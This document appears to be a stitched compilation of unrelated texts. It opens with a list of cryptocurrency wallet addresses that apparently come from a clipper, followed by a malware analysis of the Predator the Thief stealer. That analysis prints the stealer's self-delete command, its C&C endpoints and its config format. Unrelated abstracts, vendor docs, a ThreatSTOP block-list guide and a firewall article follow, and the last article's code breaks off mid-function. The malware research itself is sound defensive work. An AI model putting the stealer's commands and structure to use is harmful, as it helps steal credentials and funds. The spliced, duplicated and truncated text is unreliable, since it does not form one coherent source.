q*:qztrpt42h78ks7h6jlgtqtvhp3q6utm7sqrsupgwv0|
G*:GaJvoTcC4Bw3kitxHWU4nrdDK3izXCTmFQ|
X*:XruZmSaEYPX2mH48nGkPSGTzFiPfKXDLWn|
L*:LdPvBrWvimse3WuVNg6pjH15GgBUtSUaWy|
t*:t1dLgBbvV6sXNCMUSS5JeLjF4XhhbJYSDAe|
4*:44tLjmXrQNrWJ5NBsEj2R77ZBEgDa3fEe9GLpSf2FRmhexPvfYDUAB7EXX1Hdb3aMQ9FLqdJ56yaAhiXoRsceGJCRS3Jxkn|
D*:DUMKwVVAaMcbtdWipMkXoGfRistK1cC26C|
A*:AaUgfMh5iVkGKLVpMUZW8tGuyjZQNViwDt|
There is no communication with the C&C when the clipper is switching wallets; it's an offline one.
When the corresponding parameter is set to 1 in the Predator config retrieved by check.get, the malware performs a really simple task to erase itself from the machine when all the tasks are done. Looking at the bottom of the main big function where all the tasks are performed, you can see two main blocks that could be skipped. These two are huge stack strings that generate two things:
- The API request "ShellExecuteA"
- The command "ping 127.0.0.1 & del %PATH%"
When everything is prepared, the thing is simply executed behind the classic register call. By the way, doing a ping request is one of a dozen ways to emulate a sleep call and wait a little before performing the deletion. This option is not performed by default when the malware is not able to get data from the C&C.
There is a bunch of files proper to this stealer that are generated during the whole infection process. Each of them has a specific meaning:
- Signature of the stealer
- Stealing statistics
- Computer specs
- Number of users on the machine
- List of logical drives
- Current resource usage
- Clipboard content
- Network info
- Compile-time of the payload
Also, this generated file is literally "hell" when you want to dig into it, given the amount of obfuscated code. I can quote the following important telemetry files:
- Windows build version
- Generated User-Agent
- List of software installed on the machine (checking both x32 and x64 architecture folders)
- List of actions & telemetry performed by the stealer itself during the stealing process
- List of SLN filenames found during the grabber research (the static one)
- List of cookie content fetched/parsed
Sometimes features are fun to dig into: when I heard that Predator is now generating a dynamic User-Agent, I was imagining things, but in fact, it's way simpler than I thought.
Sometimes features are fun to dig into. When I heard that Predator now generates a dynamic User-Agent, I was imagining all kinds of things, but in fact it is way simpler than I thought. The User-Agent is generated in a few steps:
- Decrypting a static string that contains the first part of the User-Agent
- Calling GetTickCount and grabbing its last bytes to generate a fake Chrome build version
- Decrypting another static string that contains the end of the User-Agent
- Concatenating everything

This User-Agent is shown in the software.txt logfile.

There are currently four kinds of requests seen in Predator 3.3.2 (always POST requests):
- api/check.get – Get dynamic config, tasks and network info
- api/gate.get?…… – Send stolen data
- api/.get – Get the modular dynamic config
- api/.post – Get the modular dynamic payload (seen with the clipper)

The first step – Get the config & extra infos

For the first request, the response from the server always has a specific form:
- A string, obviously base64-encoded
- Encrypted with RC4, using the domain name as the key

(A sketch of this decryption appears at the end of this section.) When decrypted, the config is pretty easy to guess and also a bit complex, given the number of options and parameters available to the threat actor:

[0;1;0;1;1;0;1;1;0;512;]#[[%userprofile%\Desktop|%userprofile%\Downloads|%userprofile%\Documents;*.xls,*.xlsx,*.doc,*.txt;128;;0]]#[Trakai;Republic of Lithuania;54.6378;24.9343;22.214.171.124;Europe/Vilnius;21001]##[Clipper]

It is easy to see that the config is split by “#”, and each part can be summarized like this:
- The stealer config
- The grabber config
- The network config
- The loader config
- The dynamic modular config (i.e., the clipper)

I have represented each of them below with the meaning of each parameter (where it was possible to identify it).

Stealer config:
- Field 1 – Webcam screenshot
- Field 2 – Anti-VM
- Field 5 – Desktop screenshot
- Field 7 – Self-destroy
- Field 9 – Windows cookies
- Field 10 – Max size for grabbed files
- Field 11 – PowerShell script (in base64)

Grabber config:
- Field 1 – %PATH%, using “|” as a delimiter
- Field 2 – Files to grab
- Field 3 – Max size for each grabbed file
- Field 5 – Recursive search (0 – off | 1 – on)

Network config:
- Field 3 – GPS coordinates
- Field 4 – Time zone
- Field 5 – Postal code

Loader config:
- Loader URL
- Loader type
- Targeted countries (“,” as a delimiter)
- Blacklisted countries (“,” as a delimiter)
- Arguments on startup
- Injected process OR where it is saved and executed
- Pushing the loader if specific domain(s) are seen in the stolen data
- Pushing the loader if wallets are present
- Executing in admin mode
- Random file generated
- Repeating execution

The meaning of some arguments depends on their values: the loader type (argument 2); the architecture (argument 3), where 1 means x32 / x64; and argument 7, whose meaning differs depending on whether the loader is RunPE or CreateProcess / ShellExecuteA / LoadLibrary.

The second step – Sending stolen data

This request sends the stolen data together with victim telemetry. Among its parameters: p10 – OS version (encrypted + encoded)*. This is an example of a crafted request performed by Predator the Thief.

Third step – Modular tasks (optional)

The module .get request returns the dynamic clipper config; the .post request returns the Predator clipper payload.

The C&C is nowadays quite different from the beginning; it has been reworked with a fancy design and is able to do several things:
- Modular C&C
- Classic fancy index with statistics
- Possibility to configure the panel itself
- Dynamic grabber configuration
- Telegram notifications
- Tags for specific domains

The Predator panel changed a lot between v2 and v3. The current one uses a fancy theme, and you can easily spot all the statistics at first glance. One thing to notice is that the panel is fully in Russian (and I don't know, at this time, whether an English one exists).
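As a companion to the first step above, here is a minimal Python sketch of the described decryption: base64-decode the check.get response, RC4-decrypt it with the C&C domain as the key, and split the result on “#”. This mirrors the scheme as described, not Predator's actual code.

import base64

def rc4(key: bytes, data: bytes) -> bytes:
    # Plain RC4: key scheduling (KSA) followed by the PRGA keystream XOR.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decrypt_config(response_b64: str, c2_domain: str) -> list:
    raw = rc4(c2_domain.encode(), base64.b64decode(response_b64))
    # Parts: stealer / grabber / network / loader / module configs.
    return raw.decode(errors="replace").split("#")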
The menu on the left is divided like this (though I'm not completely sure about the translation):
- Логов (Logs)
- По странам (Country stats)
- Лоадера (Loader stats)
- Загрузить модуль (Download/Upload module)
- Настройки сайта (Site settings)
- Телеграм бот (Telegram bot)
- Конфиг (Config)
- Конвертация (Converter => Netscape/JSON converter)

Statistics / Landscape

In terms of configuring Predator, the choices are pretty wide:
- The actor can tweak the panel itself by modifying some details, like the title; a detail that made me laugh is that you can even choose a dark theme.
- There is also another form where the payload config is set by simply ticking options; when done, this updates the response returned by check.get.
- As usual, there is a Telegram bot feature.

Creating tags for domains seen: a small detail also mentioned for Vidar. If the actor wants specific attention paid to bots whose data comes from specific domains, he can create a tag that makes it easy to filter which bots are probably worth digging into.

The loader configuration is by far the most interesting part in my opinion; even though its functionality has already been explained in full, I consider it quite complete and user-friendly for the threat actor using it.

Hashes for this analysis

p_pckd.exe – 21ebdc3a58f3d346247b2893d41c80126edabb060759af846273f9c9d0c92a9a
p_upkd.exe – 6e27a2b223ef076d952aaa7c69725c831997898bebcd2d99654f4a1aa3358619
p_clipper.exe – 01ef26b464faf08081fceeeb2cdff7a66ffdbd31072fe47b4eb43c219da287e8

Other Predator hashes

Infostealers are not considered as harmful as the recent, highly mediatized ransomware attacks, but they are effective enough to cause severe damage and should not be underrated. Furthermore, with cryptocurrencies becoming more and more common, or even something totally normal nowadays, the lack of security hygiene on this subject is awfully insane, and I am not surprised at all to see so much money stolen. Stealers will remain really active, and it is always interesting to keep an eye on this malware family (and on clippers as well): whenever a new wallet or cryptocurrency-trading application shows up in the target list, you can easily tell the possible trends (even with little knowledge of that area).

Nowadays it is easy to see fresh activity in the wild for this info stealer; it can be dropped by important malware campaigns in which notorious malware like ISFB Gozi is also used. It is unnecessary (on my side) to speculate about Predator's next move; I have clearly no idea and am not interested in that kind of exercise. The malware scene nowadays evolves really fast: threat-actor teams move and switch easily, and it can take only hours for a malware to be updated or reworked by swapping in a piece of code already available in some GitHub repository, or by copying code from another malware. The price of the malware gets adjusted, or the support communication moves elsewhere. Because of this, I am pretty sure this in-depth analysis could already be outdated by some modifications. That is always a risk to take; on my side, I am only interested in the malware itself, and since the main ideas and facts of the major version are explained, that is plenty sufficient. There are, of course, some topics I have not talked about, such as Predator now being able to run as a classic executable or as a DLL, but that was developed some time ago and the subject is already fairly popular.
Another point for which I did not find any explanation: some string-decryption routines lead to an encryption algorithm related to Tor. This in-depth analysis is also meant to show that even simple tricks are an efficient way to slow down analysis, and that this family is a good exercise for practicing your skills if you want to improve at malware analysis. Reverse engineering is not as hard as people might think once the fundamental concepts are assimilated; it is just time, practice and motivation. On my side, I am, as usual, fairly irregular in releasing write-ups, for various reasons (again…). Updating my projects is still one of my main focuses, and I still have some things I would love to finish that are not necessarily malware analysis; it is nice to change topics sometimes.
Chapter 9. Application Visibility Control (AVC)

This chapter covers the following topics:
- Application visibility control (AVC) use cases
- How AVC works
- The AVC building blocks
- Performance considerations when using AVC

In the early years of IP networking, it was a fairly straightforward task to identify, classify, and control traffic based on the TCP ...
International Journal of Engineering Technology, Management and Applied Sciences (IJETMAS)

A Mobile Ad hoc NETwork (MANET) is a distributed, self-configuring wireless network. A MANET does not have a predefined network infrastructure, and because its infrastructure is dynamic, it is highly vulnerable to attacks, particularly routing attacks. Several intrusion response mechanisms are available for mitigating routing attacks, but most of them simply isolate the malicious node. Risk mitigation is one of the significant factors in the MANET environment. Because of the non-stop changes in topology and an open, vulnerable transmission medium, achieving security in an ad hoc network is very difficult.
The DUP System is a language for productive, parallel, and distributed stream processing on POSIX systems. Programming with DUP is similar to writing shell scripts with pipes except that filters can have multiple inputs and outputs. Furthermore, the computation can be spread across multiple computers. A distinguishing characteristic of DUP compared to other streaming languages is that filters can be written in almost any programming language. The DUP System distribution includes the runtime system and a collection of over a dozen multi-stream filters. The Merlin project was initially started to create an easy way to set up distributed Nagios installations, allowing Nagios processes to exchange information directly as an alternative to the standard method using NSCA. It has also been extended with fault tolerance, the ability to store status information in a database, and other features. This allows Merlin to function as a backend for applications such as the Ninja project. Consh is a set of programs that can turn one or more UNIX hosts on a trusted LAN into a singular Bourne shell multi-computer on which shell scripts are run concurrently. The service abstracts hosts into what appears to be a shell process with a fixed number of threads or workers, to which work may be assigned and results received concurrently. It includes utilities that assign commands to workers in parallel and a command that initiates distributed barriers between workers for synchronization purposes. Environment variables can be set on a per-host basis to implement locking mechanisms like semaphores or ticket algorithms. Daemons can delegate work to one another as needed. Tranche is file storage and dissemination software. Designed and built with scientists and researchers in mind, Tranche can handle very large data sets, is secure and scalable, and all data sets are citable in scientific journals. Features include a fully decentralized architecture, support for very large files, very long-term file persistence/preservation, file immutability/integrity, provenance, encryption, licensing, versioning, and citability. TinyIDS is a distributed intrusion detection system (IDS) for Unix systems. It is based on the client/server architecture and has been developed with security in mind. The client, tinyids, collects information from the local system by running its collector backends. The collected information may include anything, from file contents to file metadata or even the output of system commands. The client passes all this data through a hashing algorithm and a unique checksum (hash) is calculated. This hash is then sent to one or more TinyIDS servers (tinyidsd), where it is compared with a hash that had previously been stored in the databases of those remote servers for this specific client. A response indicating the result of the hash comparison is finally sent back to the client. Management of the remotely stored hash is possible through the client's command line interface. Communication between the client and the server can be encrypted using RSA public key infrastructure (PKI). Active Insight is an ESP/CEP (Event Stream Processing/Complex Event Processing) framework for real-time, value-based detection and reaction to events and patterns. It offers a distributed (cloud ready) event processing runtime with an embedded pattern engine to support event aggregation and correlation.
Active Insight simplifies the development of distributed event processing using the plain old Java object (POJO) approach, where events and event processors are plain Java objects wired by Spring dependency injection. The framework can be used for various applications such as homeland security, online behavioral targeting, advertising, fraud detection, SIEM, telematics, algorithmic trading, and others. Java Distributed Framework is a framework for distributed grid and/or volunteer computing. It is divided into a server and a client library. You can build new applications or integrate it into existing ones in no time; no knowledge of network connections, sockets, and the like is needed, as the framework does almost everything automatically. It provides secure automatic client <-> server communications, unique IDs, automatic resending of jobs to new clients if needed, user stats, and much more. The client framework supports detecting the computer user's state (idling, away, online, etc.). It also offers many other useful features and helpers for developing a distributed client application. Libchop is a set of utilities and a library for data backup and distributed storage. Its main application is chop-backup, an encrypted backup program that supports data integrity checks, versioning at little cost, distribution among several sites, selective sharing of stored data, adaptive compression, and more. The library itself, which chop-backup builds upon, implements storage techniques such as content-based addressing, content hash keys, Merkle trees, similarity detection, and lossless compression. It makes it easy to combine them in different ways. The ‘chop-archiver’ and ‘chop-block-server’ tools, illustrated in the manual, provide direct access to these facilities from the command line. It is written in C and has Guile (Scheme) bindings.
A PROACTIVE APPROACH TO NETWORK FORENSICS INTRUSION (DENIAL OF SERVICE FLOOD ATTACK) USING DYNAMIC FEATURES, SELECTION AND CONVOLUTION NEURAL NETWORK

Keywords: Cybercrime, Deep Learning, Digital Forensics, Denial of Service Attacks, Network Monitoring System, Network Forensics

As organizations increasingly rely on internet-connected applications to store data, cybercrime has grown rapidly alongside, affecting large organizations and entire countries holding highly sensitive information, such as the United States of America, the United Kingdom and Nigeria. Organizations generate a great deal of information through digitalization, and this highly classified information is now stored in databases accessed over computer networks, which opens it to attacks by cybercriminals and state-sponsored agents. As a result, organizations and countries spend more resources analyzing cybercrimes than preventing and detecting them. Network forensics plays an important role in investigating cybercrimes, because most cybercrimes are committed via computer networks. This paper proposes a new approach to analyzing digital evidence in Nigeria using a proactive forensic method built on a deep-learning algorithm, the Convolutional Neural Network (CNN), to proactively classify malicious packets from genuine packets and log them as they occur.

Copyright (c) 2021 George & Uppin
This work is licensed under a Creative Commons Attribution 4.0 International License.
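The paper's exact features and architecture are not reproduced here, so the following tiny TensorFlow/Keras sketch only illustrates the general shape of a 1-D CNN packet classifier; the data is random placeholder data, and every dimension and hyperparameter is an assumption.

import numpy as np
import tensorflow as tf

# Toy stand-in data: 1000 "packets", each reduced to 64 numeric features, labeled 0/1.
X = np.random.rand(1000, 64, 1).astype("float32")
y = np.random.randint(0, 2, size=(1000,))

model = tf.keras.Sequential([
    tf.keras.layers.Conv1D(32, 3, activation="relu", input_shape=(64, 1)),
    tf.keras.layers.MaxPooling1D(2),
    tf.keras.layers.Conv1D(64, 3, activation="relu"),
    tf.keras.layers.GlobalMaxPooling1D(),
    tf.keras.layers.Dense(1, activation="sigmoid"),  # malicious vs. genuine
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
model.fit(X, y, epochs=3, batch_size=32)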
Getting information about applications that are installed on protected virtual machines

January 10, 2024

To create an Application Startup Control rule, it is recommended to first obtain information about the applications that are used on the protected virtual machines within the corporate LAN. You can obtain the following information:
- Vendors, versions, and localizations of applications that are used on the corporate LAN.
- Frequency of application updates.
- Application usage policies adopted within the company (these may be security or administrative policies).
- The location of the storage with application installation packages.

Information about applications that are used on the protected virtual machines on the corporate LAN is available in the Applications registry list and in the Executable files list. These lists can be viewed in the following ways:
- In the Administration Console: Additional → Application management.
- In the Web Console: Operations → Third-party applications.

The Applications registry list contains applications that were detected by the Network Agent installed on protected virtual machines. The Executable files list contains executable files that have ever been started on protected virtual machines or were detected during the Kaspersky Security inventory task. To view general information about an application and its executable files, as well as the list of protected virtual machines on which the application is installed, open the properties window of the application selected in one of these lists. The lists of applications and executable files are created by the Network Agent if the About started applications check box is selected in the Light Agent for Windows policy properties, in the Reports and Storages section, Inform Administration Server subsection.
Implementation of Enhanced Security on Vehicular Cloud Computing

In a Vehicular Cloud (VC), underutilized vehicular resources, including computing power, data storage, and internet connectivity, can be shared or rented out over the Internet to various customers. If the VC concept is to see wide adoption and have a significant societal impact, security and privacy issues need to be addressed. The main contribution is to identify and examine a number of security challenges and potential privacy threats in VCs. Even though security issues have received attention in cloud computing and vehicular networks, the authors identify security challenges that are specific to VCs, e.g., the challenges of authenticating high-mobility vehicles, scalability, and the complexity of establishing trust relationships among multiple players caused by intermittent short-range communications.
ETSI releases World-First Report to Mitigate AI-Generated Deepfakes

September 2023 by ETSI

ETSI is thrilled to announce its new Group Report on Artificial Intelligence covering the use of AI for what are commonly referred to as deepfakes. The Report, ETSI GR SAI 011, released by the Securing AI group (ISG SAI), focuses on the use of AI for manipulating multimedia identity representations and illustrates the consequential risks, as well as the measures that can be taken to mitigate them. “AI techniques allow for automated manipulations which previously required a substantial amount of manual work, and, in extreme cases, can even create fake multimedia data from scratch. Deepfake can also manipulate audio and video files in a targeted manner, while preserving high acoustic and visual quality in the results, which was largely infeasible using previous off-the-shelf technology. AI techniques can be used to manipulate audio and video files in a broader sense, e.g., by applying changes to the visual or acoustic background. Our ETSI Report proposes measures to mitigate them”, explains Scott Cadzow, Chair of ETSI ISG SAI. ETSI GR SAI 011 outlines many of the more immediate concerns raised by the rise of AI, particularly the use of AI-based techniques for automatically manipulating identity data represented in various media formats, such as audio, video, and text (deepfakes and, for example, AI-generated text software such as ChatGPT, although, as always per ETSI guidelines, the Report does not address specific products or services). The Report describes the different technical approaches, and it also analyzes the threats posed by deepfakes in various attack scenarios. By analyzing the approaches used, the ETSI Report aims to provide the basis for further technical and organizational measures to mitigate these threats, on top of discussing their effectiveness and limitations. ETSI's ISG SAI is the only standardization group that focuses on securing AI. It has already released eight Group Reports. The group works to rationalize the role of AI within the threat landscape and, in doing so, to identify measures that will lead to the safe and secure deployment of AI alongside the population that the AI is intended to serve.
We have written some scripts that you can use to get your ThreatSTOP block lists. Download the scripts here. The script queries the ThreatSTOP DNS server and stores the results in a file that PF can use to build a table. The resulting file is a list of IP addresses in CIDR format. You can then create a rule that will block access to and from the table. If this is a new device, please allow up to 15 minutes for our systems to be updated. The only prerequisite for OpenBSD systems is one Perl module and its dependencies. These are available as binary packages for OpenBSD. To install the module, run the following as root:

pkg install p5-libwww

This will install the LWP Perl module and any dependencies it defines.

- threatstop-pf.sh: The main script. It downloads the block lists and creates the files PF uses to populate a table.
- loguploadclient.pl: Perl script that uploads the log file.
- sendlog.sh: Converts the PF log file to plain text and calls loguploadclient.pl to upload it.
- install.sh: Installation script.
- test.sh: Script to run a quick test to make sure the block lists are ready to be downloaded.
- apl.sed: Supporting sed script to parse DNS APL query results.
- ptr.sed: Supporting sed script to parse DNS PTR query results.
- threatstop.conf.example: Example configuration file.

The IP address provided in the configuration sample (220.127.116.11), while accurate, is not currently supported by BSD Packet Filtering. We apologize for the inconvenience. In the interim, please use the IP address 18.104.22.168; this is our legacy DNS server but will work with the current script. After downloading and extracting the script, copy the configuration from the ThreatSTOP website into a file named “threatstop.conf” in the same directory where you extracted the downloaded file. There are some settings in the configuration that you will need to verify:

- OUT_DIR: Directory where the files that PF uses to build the tables will be saved.
- BLOCK_FILE: Location and name of the file with IP addresses to block.
- ALLOW_FILE: Location and name of the file with IP addresses to allow.
- BLOCK_TABLE: The name of the PF table that will hold the IP addresses to block.
- ALLOW_TABLE: The name of the PF table that will hold the IP addresses to allow.
- RELOAD_PF: The script can automatically flush and reload the ThreatSTOP tables.
- logfile: Temporary file used by the sendlog.sh script.
- url: URL to upload the plain text output of the log file.

Copy the configuration below to a file named “threatstop.conf” in the same directory where the download was extracted.

ThreatSTOP Configuration file

# Final location of the files PF will use for the tables
OUT_DIR="/var/db"
# ThreatSTOP DNS Servers
# You can add or remove entries. Each server must be separated by a space
DNS_SERVERS="22.214.171.124"
# The block and/or allow list
BLOCK_LIST=<block list name>.<ThreatSTOP account ID>.threatstop.local
ALLOW_LIST=<allow list name>.<ThreatSTOP account ID>.threatstop.local
# The name of the files pf will use for the tables
BLOCK_FILE="$OUT_DIR/tsblock.txt"
ALLOW_FILE="$OUT_DIR/tsallow.txt"
# The name of the table for PF
BLOCK_TABLE="ThreatSTOP"
ALLOW_TABLE="ThreatSTOP-Allow"
# Automatically reload PF after the files are created
RELOAD_PF="YES"
#
# Options for the sendlog.sh script
#
# Location and name of the PF log file
PFLOG="/var/log/pflog.0"
# Name of the log file to upload.
# File is created and deleted by the sendlog.sh script
logfile="/tmp/pflog.txt"
# URL to upload the logs to
url=https://www.threatstop.com/cgi-bin/logupload.pl

Before running the script, it needs to be installed with the provided install.sh script. The script copies threatstop-pf.sh, sendlog.sh, loguploadclient.pl, ptr.sed, and apl.sed to /usr/local/sbin, and copies the threatstop.conf file to /usr/local/etc. In order to have the block lists updated at regular intervals, it creates a cron job that runs the script every two hours. It also creates a job to run the sendlog.sh script to upload the log file every night at 1:00 AM. To have the logs uploaded on a daily basis, the script modifies the /etc/newsyslog.conf file so that /var/log/pflog is rotated every night at 12:00 AM. In the newsyslog.conf file, it changes:

/var/log/pflog 600 3 250 * ZB "pkill -HUP -u root -U root -t - -x pflogd"

to:

/var/log/pflog 600 3 * $D0 ZB "pkill -HUP -u root -U root -t - -x pflogd"

As root, run the “install.sh” script:

./install.sh
/usr/local/sbin does not exist. Creating.
Copying scripts to "/usr/local/sbin"
Copying configuration file to "/usr/local/etc"
Adding crontab entry to run the "threatstop-pf.sh" script every 2 hours and upload the log file with the "sendlog.sh" script every day at 1:00 AM
Backing up original crontab to "crontab.original"
Changing the newsyslog.conf file to rotate pflog every day at 12:00 AM
Creating backup of newsyslog.conf

Before running the main script to get your block lists and create the files, we need to make sure that your block lists are ready. We have included the “test.sh” script that you can run to verify everything is ready. If the test does not work within an hour of creating your device, please contact support for assistance.

./test.sh
DNS Server 126.96.36.199 is ready.
The test was successful. You are now ready to run the threatstop-pf.sh script.

After making sure the test script works, you can now run the main script, threatstop-pf.sh. The script gets your block lists and creates the files that PF can use to populate a table. The files are saved to /var/db. In order for PF to load any updates to the ThreatSTOP lists, PF needs to flush and reload the table; the configuration file provides an option to do this automatically after the block lists have been downloaded:

# threatstop-pf.sh
Starting ThreatSTOP v1.3 update on Fri Aug 12 07:42:05 PDT 2016
Using DNS Server 188.8.131.52
Processing allow list <allow list name>.<ThreatSTOP account ID>.threatstop.local
Processing block list <block list name>.<ThreatSTOP account ID>.threatstop.local
Completed getting all the lists
Adding 26424 blocked addresses
Adding 3 allowed addresses
Reloading pf...done
Finished ThreatSTOP update at Fri Aug 12 07:42:15 PDT 2016
Run Length: 0 hour(s) 0 minute(s) 10 second(s)

This will create the files “tsblock.txt” and “tsallow.txt” in the /var/db directory. Once the files containing the addresses to block are created, you will need to configure PF to use them as tables. In the /etc/pf.conf file, add the table definitions:

table <ThreatSTOP> persist file "/var/db/tsblock.txt"
table <ThreatSTOP-Allow> persist file "/var/db/tsallow.txt"

With the tables defined, you can create the rules to block traffic to and from the addresses in the block table. We recommend that the rules blocking the ThreatSTOP table be placed before any rules that allow incoming or outgoing traffic.
The “quick” directive tells PF to treat the rule as the last matching rule; any rules after it are not evaluated.

pass in quick from <ThreatSTOP-Allow>
pass out quick to <ThreatSTOP-Allow>
block drop in log quick from <ThreatSTOP>
block drop out log quick to <ThreatSTOP>

After you make the changes to the /etc/pf.conf file, PF will need to be reloaded to read the updated configuration:

/sbin/pfctl -f /etc/pf.conf

To view the addresses in the tables, run:

# pfctl -T show -t ThreatSTOP
# pfctl -T show -t ThreatSTOP-Allow

To view the updated rules, run:

/sbin/pfctl -s rules

Sending Your Logs

We have a log parsing feature: we can take your firewall log, parse it, and compare the source and destination IP addresses to what is in our database. You can then log in to our website and see the results. This allows you, and us, to see how effective we are in protecting your network infrastructure. The log file written by PF is in binary format and must be converted before it is sent to ThreatSTOP. We have included a script that converts the log to plain text and uploads the file to the secure ThreatSTOP website. The installation script has already configured your system to run the sendlog.sh script every night at 1:00 AM. If you would like to upload a log now, run the following command as root:

/usr/local/sbin/sendlog.sh
Log file uploaded successfully

Restore to Previous State

If you decide to return to your pre-ThreatSTOP configuration, perform the following actions to disable and remove ThreatSTOP from your system:
- Stop the VM from updating the firewall by deleting the user crontab.
- Remove the ThreatSTOP address groups from the policies using them (or delete the policies completely).
- Delete the ThreatSTOP address groups (TSBlock-(number) and TSAllow-(number)).
2016 was the “year of extortion”, according to the non-profit spam-fighting project, Spamhaus, which saw unprecedented growth in servers dedicated to hosting ransomware. The Locky, CryptoWall, TeslaCrypt and TorrentLocker variants of ransomware collectively had at least 1,162 command and control (C&C) servers used to communicate with networks of infected PCs, otherwise known as botnets, according to Spamhaus' figures for 2016. These families' infrastructure represented 16 percent of the 7,314 servers on the Spamhaus block list (SBL) in 2016, which contains internet protocol (IP) addresses it recommends not to accept email from. The list, comprised of hacked and dedicated cybercrime servers, is shared with ISPs, hosting providers and other large network operators to protect email users from major sources of spam. According to Spamhaus, the SBL shrank 14 percent, from 8,480 IP addresses in 2015, closer to the list's total in 2014, at 7,182 IP addresses. However, the group's other database, the Botnet Controller List (BCL), which is comprised only of servers known to exclusively support cybercriminal activity, grew 12 percent in 2016 to 4,481, from 4,009 in 2015. The BCL is used to block all incoming and outbound traffic from malicious servers. Besides ransomware, banking trojans dominated last year's malware, including the Zeus, Gozi and Dridex families. Appearing for the first time were 393 servers dedicated to controlling compromised Internet of Things devices, which were behind last year's record-breaking distributed denial of service (DDoS) attacks attributed to Mirai malware. A smaller SBL might indicate a shrinking cybercrime footprint, but Spamhaus contends the decline was due to botnet operators moving C&C servers to the dark web or hidden services, which are protected primarily by The Onion Router (Tor) anonymization network. Using Tor to hide a botnet isn't new, but its rising popularity among cybercriminals may soon threaten Tor's viability as a legitimate privacy tool, warns Spamhaus. Tor can be used to dodge surveillance efforts to track the IP address a person uses when accessing websites. The problem, argues Spamhaus, is that it's impossible for network operators to filter benign from malicious Tor traffic, so there may come a time when operators are forced to block all Tor traffic. This could impact privacy-focused email providers like ProtonMail. “Due to the nature of such anonymization networks, it is impossible to easily block certain content hosted in the dark web (e.g. botnet controllers), nor to identify the final target of a C&C communication (e.g. where the malware is sending the stolen data, such as credentials or credit card details, to),” writes the Spamhaus project. “From the perspective of a network operator, the only way to prevent abuse from anonymization networks is to block them entirely, which can be a difficult choice as there are also legitimate uses for them.
We believe that ISPs and hosting providers will be confronted in the near future with the question of whether to allow the use of anonymization services such as Tor or to block them completely, unless operators of anonymization services step up to stop abusers in a more effective way.” According to Spamhaus, cybercriminals build C&C infrastructure through two main channels: hacking web servers using flaws in web content management systems, such as WordPress and Joomla, and fraudulently signing up to ISPs or hosting providers in order to rent server capacity. The provider hosting the most malicious servers in Spamhaus' database was French ISP OVH, with 395 C&C servers, followed by US hosting provider, GoDaddy, with 257. OVH also hosted the most servers that were acquired through fraudulent sign-ups throughout 2016.
What is stateful inspection in networking? Stateful inspection, also known as dynamic packet filtering, is a firewall technology that monitors the state of active connections and uses this information to determine which network packets to allow through the firewall. Stateful inspection is commonly used in place of stateless inspection, or static packet filtering, and is well suited to Transmission Control Protocol (TCP) and similar protocols, although it can also support protocols such as User Datagram Protocol (UDP). Stateful inspection is a network firewall technology used to filter data packets based on state and context. Check Point Software Technologies developed the technique in the early 1990s to address the limitations of stateless inspection. Stateful inspection has since emerged as an industry standard and is now one of the most common firewall technologies in use today. Stateful inspection operates primarily at the transport and network layers of the Open Systems Interconnection (OSI) model for how applications communicate over a network, although it can also examine application layer traffic, if only to a limited degree. Packet filtering is based on the state and context information that the firewall derives from a session's packets: - State. The state of the connection, as it's specified in the session packets. In TCP, for example, the state is reflected in specific flags, such as SYN, ACK and FIN. The firewall stores state information in a table and updates the information regularly. - Context. Information such as source and destination Internet Protocol (IP) addresses and ports, sequence numbers and other types of metadata. The firewall also stores context information and updates it regularly. By tracking both state and context information, stateful inspection can provide a greater degree of security than with earlier approaches to firewall protection. The stateful firewall inspects incoming traffic at multiple layers in the network stack, while providing more granular control over how traffic is filtered. The firewall can also compare inbound and outbound packets against the stored session data to assess communication attempts. What are stateful and stateless inspection? Stateful inspection has largely replaced stateless inspection, an older technology that checks only the packet headers. The stateless firewall uses predefined rules to determine whether a packet should be permitted or denied. It relies on only the most basic information, such as source and destination IP addresses and port numbers, and never looks past the packet's header, making it easier for attackers to penetrate the perimeter. For example, an attacker could pass malicious data through the firewall simply by indicating "reply" in the header. Stateful inspection can monitor much more information about network packets, making it possible to detect threats that a stateless firewall would miss. A stateful firewall maintains context across all its current sessions, rather than treating each packet as an isolated entity, as is the case with a stateless firewall. However, a stateful firewall requires more processing and memory resources to maintain the session data, and it's more susceptible to certain types of attacks, including denial of service. With stateless inspection, lookup operations have much less of an impact on processor and memory resources, resulting in faster performance even if traffic is heavy. 
That said, a stateless firewall is more interested in classifying data packets than inspecting them, treating each packet in isolation without the session context that comes with stateful inspection. This also results in less filtering capabilities and greater vulnerability to other types of network attacks. How does stateful inspection work? Stateful inspection monitors communications packets over a period of time and examines both incoming and outgoing packets. The firewall tracks outgoing packets that request specific types of incoming packets and allows incoming packets to pass through only if they constitute a proper response. A stateful firewall monitors all sessions and verifies all packets, although the process it uses can vary depending on the firewall technology and the communication protocol being used. For example, when the protocol is TCP, the firewall captures a packet's state and context information and compares it to the existing session data. If a matching entry already exists, the packet is allowed to pass through the firewall. If no match is found, the packet must then undergo specific policy checks. At that point, if the packet meets the policy requirements, the firewall assumes that it's for a new connection and stores the session data in the appropriate tables. It then permits the packet to pass. If the packet doesn't meet the policy requirements, the packet is rejected. The process works a little differently for UDP and similar protocols. Unlike TCP, UDP is a connectionless protocol, so the firewall cannot rely on the types of state flags inherent to TCP. Instead, it must use context information, such as IP addresses and port numbers, along with other types of data. In effect, the firewall takes a pseudo-stateful approach to approximate what it can achieve with TCP. In a firewall that uses stateful inspection, the network administrator can set the parameters to meet specific needs. For example, an administrator might enable logging, block specific types of IP traffic or limit the number of connections to or from a single computer. In a typical network, ports are closed unless an incoming packet requests connection to a specific port and then only that port is opened. This practice prevents port scanning, a well-known hacking technique.
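To make the TCP flow described above concrete, here is a minimal Python sketch of the stateful idea: track sessions by their 5-tuple and admit packets that belong to an existing session, while new flows must pass a policy check. The packet format and the one-line policy are illustrative stand-ins, not any particular firewall's implementation.

# Minimal session table keyed by (src, sport, dst, dport, proto).
POLICY_ALLOWED_PORTS = {80, 443}
sessions = set()

def allow(pkt):
    key = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"], pkt["proto"])
    reverse = (pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"], pkt["proto"])
    if key in sessions or reverse in sessions:   # matching entry -> pass through
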